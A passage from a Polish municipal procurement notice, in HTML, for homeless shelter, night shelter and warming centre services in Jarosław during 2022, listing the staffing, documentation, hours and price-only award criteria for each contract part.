będzie podczas realizacji umowy do zapewnienia dostępności architektonicznej i/lub informacyjno-komunikacyjnej osobom ze szczególnymi potrzebami na poziomie minimalnych wymagań, określonych w art. 6-7 ustawy z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami (Dz. U. z 2020 r. poz. 1062) oraz wykazania w ofercie konkretnych działań w tym zakresie.<br/>f)	W przypadku gdy w trakcie realizacji zamówienia wydane zostaną nowe wytyczne bądź ustanowione zostaną określone ograniczenia, nakazy i zakazy w związku z wystąpieniem stanu epidemii, stanu zagrożenia epidemicznego lub stanu nadzwyczajnego, Wykonawca obowiązany będzie do ich wdrożenia lub zastosowania się do nich. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 - Schronisko dla osób bezdomnych z usługami opiekuńczymi<br/><br/>1)	Przedmiotem zamówienia jest świadczenie usług schronienia wraz<br/>z wyżywieniem w schronisku dla osób bezdomnych z usługami opiekuńczymi<br/>z terenu Gminy Miejskiej Jarosław dla szacunkowo 2 bezdomnych osób w okresie<br/>od 01.01.2022 r. do 31.12.2022 r. (podana przez Zamawiającego liczba bezdomnych osób jest liczbą przewidywaną w całym okresie trwania niniejszego zamówienia; osoby bezdomne, będą kierowane do schroniskaw różnych terminach i na różne okresy czasu; Zamawiający zastrzega sobie możliwość zmniejszenia lub zwiększenia liczby osób w zależności od faktycznych potrzeb w tym zakresie; z tego tytułu Wykonawcy nie będą przysługiwały żadne roszczenia, w tym pieniężne wobec Zamawiającego; Zamawiający będzie dokonywał zapłaty za faktyczną liczbę osób korzystających z usług świadczonych przez schronisko).<br/>2)	Nazwa i kody wg wspólnego słownika zamówień (CPV): 85311000-2.<br/>3)	Schronisko musi funkcjonować przez cały rok, przez 7 dni w tygodniu<br/>i zapewniać możliwość całodobowego przebywania<br/>4)	Udzieleniem schronienia w formie schroniska dla osób bezdomnych będą objęte osoby z terenu Gminy Miejskiej Jarosław legitymujące się decyzją administracyjną o udzieleniu schronienia po zawarciu kontraktu socjalnego (obowiązek zawarcia kontraktu socjalnego nie dotyczy osób, którym schronienia w schronisku dla osób bezdomnych udziela gmina miejsca jej pobytu, na podstawie art. 101 ust. 3 ustawy z dnia 12 marca 2004 r. o pomocy społecznej). Osoby bezdomne będą obowiązane do ponoszenia odpłatności za pobyt w schronisku zgodnie z właściwą uchwałą Rady Miasta Jarosławia.<br/>5)	Schronisko obowiązane jest zapewnić osobom bezdomnym, które ze względu<br/>na wiek, chorobę lub niepełnosprawność wymagają częściowej opieki i pomocy<br/>w zaspokajaniu niezbędnych potrzeb życiowych, ale nie wymagają usług<br/>w zakresie świadczonym przez jednostkę całodobowej opieki, zakład opiekuńczo-leczniczy lub zakład opiekuńczo-pielęgnacyjny, tymczasowe schronienie wraz<br/>z usługami opiekuńczymi oraz usługami ukierunkowanymi na wzmacnianie aktywności społecznej, w miarę możliwości wyjście z bezdomności i uzyskanie samodzielności życiowej. <br/>6)	Do wykonywania czynności w zakresie usług świadczonych w schronisku dla osób bezdomnych z usługami opiekuńczymi Wykonawca zobowiązany jest zatrudniać:<br/>a)	pracowników socjalnych,<br/>b)	opiekunów posiadających kwalifikacje do wykonywania zawodu pielęgniarki, ratownika medycznego, opiekuna w domu pomocy społecznej, opiekuna osoby starszej, asystenta osoby niepełnosprawnej, opiekunki środowiskowej, opiekuna medycznego lub co najmniej wykształcenie zasadnicze branżowe lub zasadnicze zawodowe, udokumentowane co najmniej roczne doświadczenie zawodowe polegające na świadczeniu usług opiekuńczych osobom niepełnosprawnym, przewlekle chorym lub osobom w podeszłym wieku oraz ukończone szkolenie z zakresu udzielania pierwszej pomocy. <br/>7)	Usługi świadczone w schronisku dla osób bezdomnych oraz obiekt, w którym zlokalizowane jest schronisko muszą spełniać odpowiednie warunki przeciwpożarowe i sanitarno-higieniczne oraz minimalne standardy określone<br/>w załączniku nr 3 do Rozporządzenia Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018 poz.896).<br/>8)	Wykonawca wyłoniony w postępowaniu obowiązany będzie do prowadzenia dokumentacji dotyczącej osób, którym udzielono schronienia w schronisku dla osób bezdomnych tj. karty pobytu osoby bezdomnej zawierającej datę przyjęcia do schroniska, datę opuszczenia schroniska, nr decyzji, list obecności, karty pracy socjalnej, dokumentów współpracy klientów z innymi placówkami, policją i innymi instytucjami. <br/>9)	Wykonawca zobowiązany będzie do niezwłocznego pisemnego, mailowego lub telefonicznego poinformowania Zamawiającego o niezgłoszeniu się, nieprzebywaniu klienta w schronisku lub ogrzewalni przez okres dłuższy niż przez 3 kolejne dni, a także o wszystkich sytuacjach wydalenia klienta ze schroniska z podaniem przyczyny w terminie nie dłuższym niż 1 dzień od dnia zdarzenia.<br/>10)	Do obowiązków Wykonawcy realizujących usługi należeć będzie:<br/>a)	wykonywanie czynności będących przedmiotem umowy pomiędzy Zamawiającym a Wykonawcą z najwyższą starannością, zgodnie z zawartą umową oraz zgodnie z ustawą z dnia 12 marca 2004 r. o pomocy społecznej (t.j. Dz. U. z 2020 r. poz. 1876 z późn. zm.) oraz rozporządzeniem Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018 r. poz. 896) oraz nadzór nad prawidłowym jej wykonywaniem,<br/>b)	po każdym miesiącu wykonywania usług Wykonawca przedstawi Zamawiającemu fakturę/rachunek za wykonaną usługę oraz miesięczną informację składającą się z ewidencji osób przyjętych do schroniska i/lub schroniska z usługami opiekuńczymi i/lub noclegowni i/lub ogrzewalni oraz list obecności osób przebywających w w/w placówkach podpisanych przez te osoby (rozliczenie faktury/rachunku nastąpi na podstawie faktycznej ilości dni i liczby osób korzystających ze świadczenia schronienia; Zamawiający ureguluje należność powstałą z tytułu wykonania usługi schronienia w terminie 14 dni od dnia otrzymania prawidłowo otrzymanej faktury/rachunku; należność za wykonanie usługi będzie płatna na rachunek bankowy Zamawiającego wskazany na fakturze/rachunku),<br/>c)	Wykonawca obowiązany będzie do udostępniania Zamawiającemu wszelkich dokumentów związanych z realizacją umowy Zamawiającemu oraz innym uprawnionym podmiotom, w celu kontroli w zakresie prawidłowej realizacji usługi,<br/>d)	Wykonawca obowiązany będzie do wdrożenia i stosowania opracowanej przez Ministerstwo Rodziny i Polityki Społecznej Procedury dla podmiotów prowadzących placówki udzielające wsparcia osobom bezdomnym w czasie epidemii oraz instrukcją postępowania w sytuacji podejrzenia u osoby bezdomnej zarażenia wirusem SARS-CoV-2 (procedura opublikowana jest pod adresem: https://www.gov.pl/attachment/ad6461f2-c377-4f67-a21a-c9f0d5470353). <br/>e)	Wykonawca zobowiązany będzie podczas realizacji umowy do zapewnienia dostępności architektonicznej i/lub informacyjno-komunikacyjnej osobom ze szczególnymi potrzebami na poziomie minimalnych wymagań, określonych w art. 6-7 ustawy z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami (Dz. U. z 2020 r. poz. 1062) oraz wykazania w ofercie konkretnych działań w tym zakresie.<br/>f)	W przypadku gdy w trakcie realizacji zamówienia wydane zostaną nowe wytyczne bądź ustanowione zostaną określone ograniczenia, nakazy i zakazy w związku z wystąpieniem stanu epidemii, stanu zagrożenia epidemicznego lub stanu nadzwyczajnego, Wykonawca obowiązany będzie do ich wdrożenia lub zastosowania się do nich. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4 - Noclegownia dla bezdomnych mężczyzn<br/><br/>1)	Przedmiotem zamówienia jest świadczenie usług schronienia w noclegowni dla bezdomnych mężczyzn z terenu Gminy Miejskiej Jarosław dla szacunkowo 2 bezdomnych mężczyzn w okresie od 01.01.2022 r. do 31.12.2022 r. (podana przez Zamawiającego liczba bezdomnych mężczyzn jest liczbą przewidywaną w całym okresie trwania niniejszego zamówienia; osoby bezdomne, będą trafiały do noclegowni w różnych terminach i na różne okresy czasu; Zamawiający zastrzega sobie możliwość zmniejszenia lub zwiększenia liczby osób w zależności od faktycznych potrzeb w tym zakresie; z tego tytułu Wykonawcy nie będą przysługiwały żadne roszczenia, w tym pieniężne wobec Zamawiającego; Zamawiający będzie dokonywał zapłaty za faktyczną liczbę osób korzystających z usług świadczonych przez noclegownię).<br/>2)	Nazwy i kody wg wspólnego słownika zamówień (CPV): 85311000-2.<br/>3)	Noclegownia powinna być czynna przez cały rok, przez 7 dni w tygodniu,<br/>w godzinach od 18.00 do 8.00 (w okresie od 01.10 do 31.03) oraz od 19.00 do 7.00 (w okresie od 01.04 do 30.09).<br/>4)	Wykonawca zobowiązuje się przyjmować osoby bezdomne z terenu Gminy Miejskiej Jarosław do noclegowni bez skierowania, dowożonych przez straż miejską, policję i inne służby porządkowe, jak również zgłaszające się osobiście.<br/>5)	Noclegownia obowiązana będzie do zapewnienia schronienia osobom bezdomnym świadcząc tymczasową pomoc w postaci miejsca noclegowego, w ramach której umożliwia spędzenie nocy w warunkach gwarantujących ochronę życia i zdrowia. <br/>6)	Do wykonywania czynności w zakresie usług świadczonych w noclegowni Wykonawca zobowiązany jest zatrudniać osoby, które posiadają wykształcenie zasadnicze branżowe lub zasadnicze zawodowe, co najmniej roczne doświadczenie w pracy z osobami bezdomnymi oraz ukończone szkolenie z zakresu udzielania pierwszej pomocy lub wykształcenie co najmniej średnie lub średnie branżowe oraz ukończone szkolenie z zakresu udzielania pierwszej pomocy.<br/>7)	Usługi świadczone w noclegowni oraz obiekt, w którym zlokalizowana jest noclegowania muszą spełniać odpowiednie warunki przeciwpożarowe i sanitarno-higieniczne oraz minimalne standardy określone w załączniku nr 1<br/>do Rozporządzenia Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018 poz.896).<br/>8)	Wykonawca wyłoniony w postępowaniu obowiązany będzie do prowadzenia dokumentacji dotyczącej osób, którym udzielono schronienia w noclegowni tj. karty pobytu osoby bezdomnej zawierającej datę przyjęcia do noclegowni oraz sposób w jaki osoba bezdomna trafiła do noclegowni, datę opuszczenia noclegowni, list obecności.<br/>9)	Wykonawca zobowiązany będzie do niezwłocznego pisemnego, mailowego lub telefonicznego poinformowania Zamawiającego o wszystkich sytuacjach wydalenia klienta z noclegowni z podaniem przyczyny w terminie nie dłuższym niż 1 dzień od dnia zdarzenia.<br/>10)	Do obowiązków Wykonawcy realizujących usługi należeć będzie:<br/>a)	wykonywanie czynności będących przedmiotem umowy pomiędzy Zamawiającym a Wykonawcą z najwyższą starannością, zgodnie z zawartą umową oraz zgodnie z ustawą z dnia 12 marca 2004 r. o pomocy społecznej (t.j. Dz. U. z 2020 r. poz. 1876 z późn. zm.) oraz rozporządzeniem Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018 r. poz. 896) oraz nadzór nad prawidłowym jej wykonywaniem,<br/>b)	po każdym miesiącu wykonywania usług Wykonawca przedstawi Zamawiającemu fakturę/rachunek za wykonaną usługę oraz miesięczną informację składającą się z ewidencji osób przyjętych do schroniska i/lub schroniska z usługami opiekuńczymi i/lub noclegowni i/lub ogrzewalni oraz list obecności osób przebywających w w/w placówkach podpisanych przez te osoby (rozliczenie faktury/rachunku nastąpi na podstawie faktycznej ilości dni i liczby osób korzystających ze świadczenia schronienia; Zamawiający ureguluje należność powstałą z tytułu wykonania usługi schronienia w terminie 14 dni od dnia otrzymania prawidłowo otrzymanej faktury/rachunku; należność za wykonanie usługi będzie płatna na rachunek bankowy Zamawiającego wskazany na fakturze/rachunku),<br/>c)	Wykonawca obowiązany będzie do udostępniania Zamawiającemu wszelkich dokumentów związanych z realizacją umowy Zamawiającemu oraz innym uprawnionym podmiotom, w celu kontroli w zakresie prawidłowej realizacji usługi,<br/>d)	Wykonawca obowiązany będzie do wdrożenia i stosowania opracowanej przez Ministerstwo Rodziny i Polityki Społecznej Procedury dla podmiotów prowadzących placówki udzielające wsparcia osobom bezdomnym w czasie epidemii oraz instrukcją postępowania w sytuacji podejrzenia u osoby bezdomnej zarażenia wirusem SARS-CoV-2 (procedura opublikowana jest pod adresem: https://www.gov.pl/attachment/ad6461f2-c377-4f67-a21a-c9f0d5470353). <br/>e)	Wykonawca zobowiązany będzie podczas realizacji umowy do zapewnienia dostępności architektonicznej i/lub informacyjno-komunikacyjnej osobom ze szczególnymi potrzebami na poziomie minimalnych wymagań, określonych w art. 6-7 ustawy z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami (Dz. U. z 2020 r. poz. 1062) oraz wykazania w ofercie konkretnych działań w tym zakresie.<br/>f)	W przypadku gdy w trakcie realizacji zamówienia wydane zostaną nowe wytyczne bądź ustanowione zostaną określone ograniczenia, nakazy i zakazy w związku z wystąpieniem stanu epidemii, stanu zagrożenia epidemicznego lub stanu nadzwyczajnego, Wykonawca obowiązany będzie do ich wdrożenia lub zastosowania się do nich. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5 - Noclegownia dla bezdomnych kobiet<br/><br/>1)	Przedmiotem zamówienia jest świadczenie usług schronienia w noclegowni dla bezdomnych kobiet z terenu Gminy Miejskiej Jarosław dla szacunkowo 1 bezdomnej kobiety w okresie od 01.01.2022 r. do 31.12.2022 r. (podana przez Zamawiającego liczba bezdomnych kobiet jest liczbą przewidywaną w całym okresie trwania niniejszego zamówienia; osoby bezdomne, będą trafiały do noclegowni w różnych terminach i na różne okresy czasu; Zamawiający zastrzega sobie możliwość zmniejszenia lub zwiększenia liczby osób w zależności od faktycznych potrzeb w tym zakresie; z tego tytułu Wykonawcy nie będą przysługiwały żadne roszczenia, w tym pieniężne wobec Zamawiającego; Zamawiający będzie dokonywał zapłaty za faktyczną liczbę osób korzystających z usług świadczonych przez noclegownię).<br/>2)	Nazwy i kody wg wspólnego słownika zamówień (CPV): 85311000-2.<br/>3)	Noclegownia powinna być czynna przez cały rok, przez 7 dni w tygodniu,<br/>w godzinach od 18.00 do 8.00 (w okresie od 01.10 do 31.03) oraz od 19.00 do 7.00 (w okresie od 01.04 do 30.09).<br/>4)	Wykonawca zobowiązuje się przyjmować osoby bezdomne z terenu Gminy Miejskiej Jarosław do noclegowni bez skierowania, dowożonych przez straż miejską, policję i inne służby porządkowe, jak również zgłaszające się osobiście.<br/>5)	Noclegownia obowiązana będzie do zapewnienia schronienia osobom bezdomnym świadcząc tymczasową pomoc w postaci miejsca noclegowego,<br/>w ramach której umożliwia spędzenie nocy w warunkach gwarantujących ochronę życia i zdrowia. <br/>6)	Do wykonywania czynności w zakresie usług świadczonych w noclegowni Wykonawca zobowiązany jest zatrudniać osoby, które posiadają wykształcenie zasadnicze branżowe lub zasadnicze zawodowe, co najmniej roczne doświadczenie w pracy z osobami bezdomnymi oraz ukończone szkolenie z zakresu udzielania pierwszej pomocy lub wykształcenie co najmniej średnie lub średnie branżowe oraz ukończone szkolenie z zakresu udzielania pierwszej pomocy.<br/>7)	Usługi świadczone w noclegowni oraz obiekt, w którym zlokalizowana jest noclegowania muszą spełniać odpowiednie warunki przeciwpożarowe i sanitarno-higieniczne oraz minimalne standardy określone w załączniku nr 1<br/>do Rozporządzenia Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018 poz.896).<br/>8)	Wykonawca wyłoniony w postępowaniu obowiązany będzie do prowadzenia dokumentacji dotyczącej osób, którym udzielono schronienia w noclegowni tj. karty pobytu osoby bezdomnej zawierającej datę przyjęcia do noclegowni oraz sposób w jaki osoba bezdomna trafiła do noclegowni, datę opuszczenia noclegowni, list obecności.<br/>9)	Wykonawca zobowiązany będzie do niezwłocznego pisemnego, mailowego lub telefonicznego poinformowania Zamawiającego o wszystkich sytuacjach wydalenia klienta z noclegowni z podaniem przyczyny w terminie nie dłuższym niż 1 dzień od dnia zdarzenia.<br/>10)	Do obowiązków Wykonawcy realizujących usługi należeć będzie:<br/>a)	wykonywanie czynności będących przedmiotem umowy pomiędzy Zamawiającym a Wykonawcą z najwyższą starannością, zgodnie z zawartą umową oraz zgodnie z ustawą z dnia 12 marca 2004 r. o pomocy społecznej (t.j. Dz. U. z 2020 r. poz. 1876 z późn. zm.) oraz rozporządzeniem Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018 r. poz. 896) oraz nadzór nad prawidłowym jej wykonywaniem,<br/>b)	po każdym miesiącu wykonywania usług Wykonawca przedstawi Zamawiającemu fakturę/rachunek za wykonaną usługę oraz miesięczną informację składającą się z ewidencji osób przyjętych do schroniska i/lub schroniska z usługami opiekuńczymi i/lub noclegowni i/lub ogrzewalni oraz list obecności osób przebywających w w/w placówkach podpisanych przez te osoby (rozliczenie faktury/rachunku nastąpi na podstawie faktycznej ilości dni i liczby osób korzystających ze świadczenia schronienia; Zamawiający ureguluje należność powstałą z tytułu wykonania usługi schronienia w terminie 14 dni od dnia otrzymania prawidłowo otrzymanej faktury/rachunku; należność za wykonanie usługi będzie płatna na rachunek bankowy Zamawiającego wskazany na fakturze/rachunku),<br/>c)	Wykonawca obowiązany będzie do udostępniania Zamawiającemu wszelkich dokumentów związanych z realizacją umowy Zamawiającemu oraz innym uprawnionym podmiotom, w celu kontroli w zakresie prawidłowej realizacji usługi,<br/>d)	Wykonawca obowiązany będzie do wdrożenia i stosowania opracowanej przez Ministerstwo Rodziny i Polityki Społecznej Procedury dla podmiotów prowadzących placówki udzielające wsparcia osobom bezdomnym w czasie epidemii oraz instrukcją postępowania w sytuacji podejrzenia u osoby bezdomnej zarażenia wirusem SARS-CoV-2 (procedura opublikowana jest pod adresem: https://www.gov.pl/attachment/ad6461f2-c377-4f67-a21a-c9f0d5470353). <br/>e)	Wykonawca zobowiązany będzie podczas realizacji umowy do zapewnienia dostępności architektonicznej i/lub informacyjno-komunikacyjnej osobom ze szczególnymi potrzebami na poziomie minimalnych wymagań, określonych w art. 6-7 ustawy z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami (Dz. U. z 2020 r. poz. 1062) oraz wykazania w ofercie konkretnych działań w tym zakresie.<br/>f)	W przypadku gdy w trakcie realizacji zamówienia wydane zostaną nowe wytyczne bądź ustanowione zostaną określone ograniczenia, nakazy i zakazy w związku z wystąpieniem stanu epidemii, stanu zagrożenia epidemicznego lub stanu nadzwyczajnego, Wykonawca obowiązany będzie do ich wdrożenia lub zastosowania się do nich. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 6 - Ogrzewalnia dla bezdomnych mężczyzn<br/><br/>1)	Przedmiotem zamówienia jest świadczenie usług schronienia w ogrzewalni dla bezdomnych mężczyzn z terenu Gminy Miejskiej Jarosław dla szacunkowo 1 bezdomnego mężczyzny w okresie od 01.01.2022 r. do 31.12.2022 r. (podana przez Zamawiającego liczba bezdomnych mężczyzn jest liczbą przewidywaną<br/>w całym okresie trwania niniejszego zamówienia; osoby bezdomne, będą trafiały do ogrzewalni w różnych terminach i na różne okresy czasu; Zamawiający zastrzega sobie możliwość zmniejszenia lub zwiększenia liczby osób w zależności od faktycznych potrzeb w tym zakresie; z tego tytułu Wykonawcy nie będą przysługiwały żadne roszczenia, w tym pieniężne wobec Zamawiającego; Zamawiający będzie dokonywał zapłaty za faktyczną liczbę osób korzystających z usług świadczonych przez ogrzewalnię).<br/>2)	Nazwy i kody wg wspólnego słownika zamówień (CPV): 85312000-9. <br/>3)	Ogrzewalnia powinna być czynna w okresie od 01.01.2022 r. do 30.04.2022 r. oraz 01.10.2022 r. do 31.12.2022 r. przez 7 dni w tygodniu, w godzinach od 18.00 do 8.00.<br/>4)	Wykonawca zobowiązuje się przyjmować osoby bezdomne z terenu Gminy Miejskiej Jarosław do ogrzewalni bez skierowania, dowożonych przez straż miejską, policję i inne służby porządkowe, jak również zgłaszające się osobiście.<br/>5)	Ogrzewalnia obowiązana będzie do zapewnienia schronienia osobom bezdomnym umożliwiającego interwencyjny bezpieczny pobyt w ogrzewanych pomieszczeniach wyposażonych co najmniej w miejsca siedzące. <br/>6)	Do wykonywania czynności w zakresie usług świadczonych w ogrzewalni Wykonawca zobowiązany jest zatrudniać osoby, które posiadają wykształcenie zasadnicze branżowe lub zasadnicze zawodowe, co najmniej roczne doświadczenie w pracy z osobami bezdomnymi oraz ukończone szkolenie z zakresu udzielania pierwszej pomocy lub wykształcenie co najmniej średnie lub średnie branżowe oraz ukończone szkolenie z zakresu udzielania pierwszej pomocy.<br/>7)	Usługi świadczone w noclegowni oraz obiekt, w którym zlokalizowana jest noclegowania muszą spełniać odpowiednie warunki przeciwpożarowe i sanitarno-higieniczne oraz minimalne standardy określone w załączniku nr 4 do Rozporządzenia Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018 poz.896).<br/>8)	Wykonawca wyłoniony w postępowaniu obowiązany będzie do prowadzenia dokumentacji dotyczącej osób, którym udzielono schronienia w ogrzewalni tj. karty pobytu osoby bezdomnej zawierającej datę przyjęcia do noclegowni oraz sposób w jaki osoba bezdomna trafiła do ogrzewalni, datę opuszczenia ogrzewalni, list obecności.<br/>9)	Wykonawca zobowiązany będzie do niezwłocznego pisemnego, mailowego lub telefonicznego poinformowania Zamawiającego o wszystkich sytuacjach wydalenia klienta z ogrzewalni z podaniem przyczyny w terminie nie dłuższym niż 1 dzień od dnia zdarzenia.<br/>10)	Do obowiązków Wykonawcy realizujących usługi należeć będzie:<br/>a)	wykonywanie czynności będących przedmiotem umowy pomiędzy Zamawiającym a Wykonawcą z najwyższą starannością, zgodnie z zawartą umową oraz zgodnie z ustawą z dnia 12 marca 2004 r. o pomocy społecznej (t.j. Dz. U. z 2020 r. poz. 1876 z późn. zm.) oraz rozporządzeniem Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018 r. poz. 896) oraz nadzór nad prawidłowym jej wykonywaniem,<br/>b)	po każdym miesiącu wykonywania usług Wykonawca przedstawi Zamawiającemu fakturę/rachunek za wykonaną usługę oraz miesięczną informację składającą się z ewidencji osób przyjętych do schroniska i/lub schroniska z usługami opiekuńczymi i/lub noclegowni i/lub ogrzewalni oraz list obecności osób przebywających w w/w placówkach podpisanych przez te osoby (rozliczenie faktury/rachunku nastąpi na podstawie faktycznej ilości dni i liczby osób korzystających ze świadczenia schronienia; Zamawiający ureguluje należność powstałą z tytułu wykonania usługi schronienia w terminie 14 dni od dnia otrzymania prawidłowo otrzymanej faktury/rachunku; należność za wykonanie usługi będzie płatna na rachunek bankowy Zamawiającego wskazany na fakturze/rachunku),<br/>c)	Wykonawca obowiązany będzie do udostępniania Zamawiającemu wszelkich dokumentów związanych z realizacją umowy Zamawiającemu oraz innym uprawnionym podmiotom, w celu kontroli w zakresie prawidłowej realizacji usługi,<br/>d)	Wykonawca obowiązany będzie do wdrożenia i stosowania opracowanej przez Ministerstwo Rodziny i Polityki Społecznej Procedury dla 